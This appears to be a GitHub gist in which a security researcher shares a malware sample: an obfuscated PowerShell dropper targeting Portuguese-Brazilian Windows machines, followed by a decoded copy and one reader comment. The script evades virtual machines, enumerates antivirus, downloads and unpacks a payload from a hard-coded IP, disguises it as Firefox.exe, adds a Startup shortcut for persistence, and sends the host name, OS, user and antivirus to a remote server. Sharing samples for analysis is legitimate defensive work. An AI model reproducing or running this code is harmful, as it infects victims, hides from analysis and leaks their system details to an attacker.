Skip to content

Instantly share code, notes, and snippets.

@JohnLaTwC

JohnLaTwC/Brazil PS1 threat

Created April 20, 2018 17:30
Show Gist options
  • Star 3 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save JohnLaTwC/0742432fad30cd00ccb4ae742a703e3e to your computer and use it in GitHub Desktop.
Save JohnLaTwC/0742432fad30cd00ccb4ae742a703e3e to your computer and use it in GitHub Desktop.
Download ZIP
Brazil PS1 threat
Raw
Brazil PS1 threat
## uploaded by @JohnLaTwC
## sample hash: 4ff21fd53f6ba8d2805574fe21b3a3470c5b719988ecdef59fed4b592c79a61c
function _/=\_____/==\/=\/\
{
try
{
${/=======\/=\_/\/=} = Get-Random -Minimum 5 -Maximum 9
${/=====\_/\/\_/\_/} = ""
For (${_____/=\_/==\_/\/}=0; ${_____/=\_/==\_/\/} -le ${/=======\/=\_/\/=}; ${_____/=\_/==\_/\/}++)
{
${/=\__/==\/\/====\} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('cQB3AGUAcgB0AHkAdQBpAG8AcABsAGsAagBoAGcAZgBkAHMAYQB6AHgAYwB2AGIAbgBtAFEAVwBFAFIAVABZAFUASQBPAFAAQQBTAEQARgBHAEgASgBLAEwAWgBYAEMAVgBCAE4ATQA=')))
${/===\/\_/====\_/=} = Get-Random -Minimum 1 -Maximum ${/=\__/==\/\/====\}.Length
${/=\________/=\__/} = ${/=\__/==\/\/====\}.Substring(${/===\/\_/====\_/=},1)
${/=====\_/\/\_/\_/} = ${/=====\_/\/\_/\_/}+${/=\________/=\__/}
}
return ${/=====\_/\/\_/\_/}
}
finally{}
}
${/===\/\_/==\/=\__} = $env:LOCALAPPDATA
${_____/=\/\_/==\_/} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('aAB0AHQAcAA6AC8ALwAxADcANAAuADEAMgA3AC4AMQAyADAALgAzAC8AMQA5AC8AaQBuAGYALgBwAGgAcAA='))) + $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('PwBwAGMAPQA=')))
${/=\/=\_/=\__/\/\_} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('aAB0AHQAcAA6AC8ALwAxADcANAAuADEAMgA3AC4AMQAyADAALgAzAC8AMQA5AC8AMQA5ADAANAAuAHoAaQBwAA==')))
${_/===\/\/\__/===\} = ${/===\/\_/==\/=\__} + $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('XABGAGkAcgBlAGYAbwB4AC4AZQB4AGUA')))
function ___________/===\__
{
${_/\/\___/=\_/===\} = gwmi -Class Win32_ComputerSystem |select -ExpandProperty Model
if (${_/\/\___/=\_/===\} -eq $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VgBpAHIAdAB1AGEAbABCAG8AeAA='))) -or
${_/\/\___/=\_/===\} -eq $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VgBNAHcAYQByAGUAIABWAGkAcgB0AHUAYQBsACAAUABsAGEAdABmAG8AcgBtAA=='))) -or
${_/\/\___/=\_/===\} -eq $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VgBpAHIAdAB1AGEAbAAgAE0AYQBjAGgAaQBuAGUA'))) -or
${_/\/\___/=\_/===\} -eq $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SABWAE0AIABkAG8AbQBVAA=='))))
{
return "Y"
}
else
{
return "N"
}
}
function ____________/===\_
{
${/\____/==\/==\/==} = gwmi -Class Win32_OperatingSystem
${/==\/\_/====\_/\/} = ${/\____/==\/==\/==}.MUILanguages
return ${/==\/\_/====\_/\/}
}
function __/\/=\/\/\_/\/\_/
{
Param([string]${________/\/=\/\___},[string]${_/==\___/====\___/});
try
{
${_/\_/\/\_/\/=\/==} = new-object System.Net.WebClient;
${_/\_/\/\_/\/=\/==}.DownloadFile(${________/\/=\/\___},${_/==\___/====\___/});
return "Y"
}finally{}
}
function _/====\_/=\/=\/\/\ {
[cmdletBinding()]
param (
[string]${___/======\__/==\/} = "${env:___/======\__/==\/}" ,
${_/=\___/===\/\__/=}
)
BEGIN
{
${/=\/=\/=\/\______} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwBFAEwARQBDAFQAIAAqACAARgBSAE8ATQAgAEEAbgB0AGkAVgBpAHIAdQBzAFAAcgBvAGQAdQBjAHQA')))
}
PROCESS
{
${/=\/\/\/=====\_/\} = gwmi -Namespace $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('cgBvAG8AdABcAFMAZQBjAHUAcgBpAHQAeQBDAGUAbgB0AGUAcgAyAA=='))) -Query ${/=\/=\/=\/\______} @psboundparameters
return ${/=\/\/\/=====\_/\}.displayName
}
END {
}
}
${__/=\/=\/\_/=\_/=} = "("+(gwmi -class Win32_OperatingSystem).Caption+")"
${/=\/\_/===\_/==\_} = "("+(gwmi -Class Win32_ComputerSystem -Property Name).Name + ")"
${_/\/\/=\_/=\/====} = "("+[Environment]::UserName+ ")"
${/===\_______/\___} = "("+(_/====\_/=\/=\/\/\)+ ")"
${_/=\/\/==\_/\/==\} = "("+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('NgA0ACAAQgBpAHQAcwA/ACAA'))) + [Environment]::Is64BitOperatingSystem+ ")"
${_/=\_/=\/\/\/\/=\} = $env:LOCALAPPDATA + $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('XABDAGgAcgBvAG0AZQAuAHgAbQBsAA==')))
${/====\__/=\_/==\/} = ${/===\/\_/==\/=\__} +"\"+ (_/=\_____/==\/=\/\) + $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('LgB6AGkAcAA=')))
${___/\/\_/\/==\__/} = [Environment]::GetFolderPath($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwB0AGEAcgB0AHUAcAA=')))) +"\"+ (_/=\_____/==\/=\/\) + $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('LgBsAG4AawA=')))
function __/==\__/\/====\__
{
ni -ItemType file -Path ${_/=\_/=\/\/\/\/=\}
}
function ___/===\/\_/\__/\/
{
${__/====\____/\_/=} = New-Object system.Net.WebClient;
${__/====\____/\_/=}.downloadString($ExecutionContext.InvokeCommand.ExpandString([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('JAB7AF8AXwBfAF8AXwAvAD0AXAAvAFwAXwAvAD0APQBcAF8ALwB9ACQAewAvAD0AXAAvAFwAXwAvAD0APQA9AFwAXwAvAD0APQBcAF8AfQAmAG8AcwA9ACQAewBfAF8ALwA9AFwALwA9AFwALwBcAF8ALwA9AFwAXwAvAD0AfQAmAHUAcwBlAHIAPQAkAHsAXwAvAFwALwBcAC8APQBcAF8ALwA9AFwALwA9AD0APQA9AH0AJgBhAHYAPQAkAHsALwA9AD0APQBcAF8AXwBfAF8AXwBfAF8ALwBcAF8AXwBfAH0A'))))
}
function _/==\_/==\_/\/\/\_
{
ni -ItemType Directory -Path ${/===\/\_/==\/=\__}
}
function ___/\___/===\/\/==(${____/==\__/\/==\_/}, ${_/=\___/\/\/\_/==\})
{
${__/\_/\___/=\___/} = new-object -com shell.application
${____/==\_/===\/==} = ${__/\_/\___/=\___/}.NameSpace(${____/==\__/\/==\_/})
foreach(${__/===\__/\/\_/=\} in ${____/==\_/===\/==}.items())
{
${__/\_/\___/=\___/}.Namespace(${_/=\___/\/\/\_/==\}).copyhere(${__/===\__/\/\_/=\})
}
}
function _/==\_______/=\/==
{
Param([string]${_/\___________/===},[string]${__/====\___/\/=\_/});
try{
${/=\_/\_/\_/==\__/} = New-Object -com $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VwBTAGMAcgBpAHAAdAAuAFMAaABlAGwAbAA=')))
${__/\_/\/=\/=\____} = ${/=\_/\_/\_/==\__/}.CreateShortcut(${_/\___________/===})
${__/\_/\/=\/=\____}.TargetPath = $ExecutionContext.InvokeCommand.ExpandString([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('JAB7AF8AXwAvAD0APQA9AD0AXABfAF8AXwAvAFwALwA9AFwAXwAvAH0A')))
${__/\_/\/=\/=\____}.IconLocation = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('JQBTAHkAcwB0AGUAbQBSAG8AbwB0ACUAXABzAHkAcwB0AGUAbQAzADIAXABTAEgARQBMAEwAMwAyAC4AZABsAGwALAAgADQAMQA=')))
${__/\_/\/=\/=\____}.Save()
}finally{}
}
if (([System.IO.File]::Exists(${_/=\_/=\/\/\/\/=\})))
{
}
else
{
if ((____________/===\_) -eq $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('cAB0AC0AQgBSAA=='))) -and (___________/===\__) -eq "N")
{
__/==\__/\/====\__
_/==\_/==\_/\/\/\_
__/\/=\/\/\_/\/\_/ -________/\/=\/\___ ${/=\/=\_/=\__/\/\_} -_/==\___/====\___/ ${/====\__/=\_/==\/}
___/\___/===\/\/== ${/====\__/=\_/==\/} ${/===\/\_/==\/=\__}
_/==\_______/=\/== -_/\___________/=== ${___/\/\_/\/==\__/} -__/====\___/\/=\_/ ${_/===\/\/\__/===\}
start-process ${_/===\/\/\__/===\}
___/===\/\_/\__/\/
}
}
## decodes to:
function _/=\_____/==\/=\/\
{
try
{
${/=======\/=\_/\/=} = Get-Random -Minimum 5 -Maximum 9
${/=====\_/\/\_/\_/} = ""
For (${_____/=\_/==\_/\/}=0; ${_____/=\_/==\_/\/} -le ${/=======\/=\_/\/=}; ${_____/=\_/==\_/\/}++)
{
${/=\__/==\/\/====\} = $('qwertyuioplkjhgfdsazxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM'))
${/===\/\_/====\_/=} = Get-Random -Minimum 1 -Maximum ${/=\__/==\/\/====\}.Length
${/=\________/=\__/} = ${/=\__/==\/\/====\}.Substring(${/===\/\_/====\_/=},1)
${/=====\_/\/\_/\_/} = ${/=====\_/\/\_/\_/}+${/=\________/=\__/}
}
return ${/=====\_/\/\_/\_/}
}
finally{}
}
${/===\/\_/==\/=\__} = $env:LOCALAPPDATA
${_____/=\/\_/==\_/} = $('http://174.127.120.3/19/inf.php')) + $('?pc='))
${/=\/=\_/=\__/\/\_} = $('http://174.127.120.3/19/1904.zip'))
${_/===\/\/\__/===\} = ${/===\/\_/==\/=\__} + $('\Firefox.exe'))
function ___________/===\__
{
${_/\/\___/=\_/===\} = gwmi -Class Win32_ComputerSystem |select -ExpandProperty Model
if (${_/\/\___/=\_/===\} -eq $('VirtualBox')) -or
${_/\/\___/=\_/===\} -eq $('VMware Virtual Platform')) -or
${_/\/\___/=\_/===\} -eq $('Virtual Machine')) -or
${_/\/\___/=\_/===\} -eq $('HVM domU')))
{
return "Y"
}
else
{
return "N"
}
}
function ____________/===\_
{
${/\____/==\/==\/==} = gwmi -Class Win32_OperatingSystem
${/==\/\_/====\_/\/} = ${/\____/==\/==\/==}.MUILanguages
return ${/==\/\_/====\_/\/}
}
function __/\/=\/\/\_/\/\_/
{
Param([string]${________/\/=\/\___},[string]${_/==\___/====\___/});
try
{
${_/\_/\/\_/\/=\/==} = new-object System.Net.WebClient;
${_/\_/\/\_/\/=\/==}.DownloadFile(${________/\/=\/\___},${_/==\___/====\___/});
return "Y"
}finally{}
}
function _/====\_/=\/=\/\/\ {
[cmdletBinding()]
param (
[string]${___/======\__/==\/} = "${env:___/======\__/==\/}" ,
${_/=\___/===\/\__/=}
)
BEGIN
{
${/=\/=\/=\/\______} = $('SELECT * FROM AntiVirusProduct'))
}
PROCESS
{
${/=\/\/\/=====\_/\} = gwmi -Namespace $('root\SecurityCenter2')) -Query ${/=\/=\/=\/\______} @psboundparameters
return ${/=\/\/\/=====\_/\}.displayName
}
END {
}
}
${__/=\/=\/\_/=\_/=} = "("+(gwmi -class Win32_OperatingSystem).Caption+")"
${/=\/\_/===\_/==\_} = "("+(gwmi -Class Win32_ComputerSystem -Property Name).Name + ")"
${_/\/\/=\_/=\/====} = "("+[Environment]::UserName+ ")"
${/===\_______/\___} = "("+(_/====\_/=\/=\/\/\)+ ")"
${_/=\/\/==\_/\/==\} = "("+$('64 Bits? ')) + [Environment]::Is64BitOperatingSystem+ ")"
${_/=\_/=\/\/\/\/=\} = $env:LOCALAPPDATA + $('\Chrome.xml'))
${/====\__/=\_/==\/} = ${/===\/\_/==\/=\__} +"\"+ (_/=\_____/==\/=\/\) + $('.zip'))
${___/\/\_/\/==\__/} = [Environment]::GetFolderPath($('Startup'))) +"\"+ (_/=\_____/==\/=\/\) + $('.lnk'))
function __/==\__/\/====\__
{
ni -ItemType file -Path ${_/=\_/=\/\/\/\/=\}
}
function ___/===\/\_/\__/\/
{
${__/====\____/\_/=} = New-Object system.Net.WebClient;
${__/====\____/\_/=}.downloadString($ExecutionContext.InvokeCommand.ExpandString('${_____/=\/\_/==\_/}${/=\/\_/===\_/==\_}&os=${__/=\/=\/\_/=\_/=}&user=${_/\/\/=\_/=\/====}&av=${/===\_______/\___}')))
}
function _/==\_/==\_/\/\/\_
{
ni -ItemType Directory -Path ${/===\/\_/==\/=\__}
}
function ___/\___/===\/\/==(${____/==\__/\/==\_/}, ${_/=\___/\/\/\_/==\})
{
${__/\_/\___/=\___/} = new-object -com shell.application
${____/==\_/===\/==} = ${__/\_/\___/=\___/}.NameSpace(${____/==\__/\/==\_/})
foreach(${__/===\__/\/\_/=\} in ${____/==\_/===\/==}.items())
{
${__/\_/\___/=\___/}.Namespace(${_/=\___/\/\/\_/==\}).copyhere(${__/===\__/\/\_/=\})
}
}
function _/==\_______/=\/==
{
Param([string]${_/\___________/===},[string]${__/====\___/\/=\_/});
try{
${/=\_/\_/\_/==\__/} = New-Object -com $('WScript.Shell'))
${__/\_/\/=\/=\____} = ${/=\_/\_/\_/==\__/}.CreateShortcut(${_/\___________/===})
${__/\_/\/=\/=\____}.TargetPath = $ExecutionContext.InvokeCommand.ExpandString('${__/====\___/\/=\_/}'))
${__/\_/\/=\/=\____}.IconLocation = $('%SystemRoot%\system32\SHELL32.dll, 41'))
${__/\_/\/=\/=\____}.Save()
}finally{}
}
if (([System.IO.File]::Exists(${_/=\_/=\/\/\/\/=\})))
{
}
else
{
if ((____________/===\_) -eq $('pt-BR')) -and (___________/===\__) -eq "N")
{
__/==\__/\/====\__
_/==\_/==\_/\/\/\_
__/\/=\/\/\_/\/\_/ -________/\/=\/\___ ${/=\/=\_/=\__/\/\_} -_/==\___/====\___/ ${/====\__/=\_/==\/}
___/\___/===\/\/== ${/====\__/=\_/==\/} ${/===\/\_/==\/=\__}
_/==\_______/=\/== -_/\___________/=== ${___/\/\_/\/==\__/} -__/====\___/\/=\_/ ${_/===\/\/\__/===\}
start-process ${_/===\/\/\__/===\}
___/===\/\_/\__/\/
}
}
@msmarcal
Copy link

I've found something interesting. I'm not a powershell specialist but it seems to try to get information from Microsoft Outlook: https://gist.github.com/msmarcal/5255423dd964f96cb65c67a0b2c210b2

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment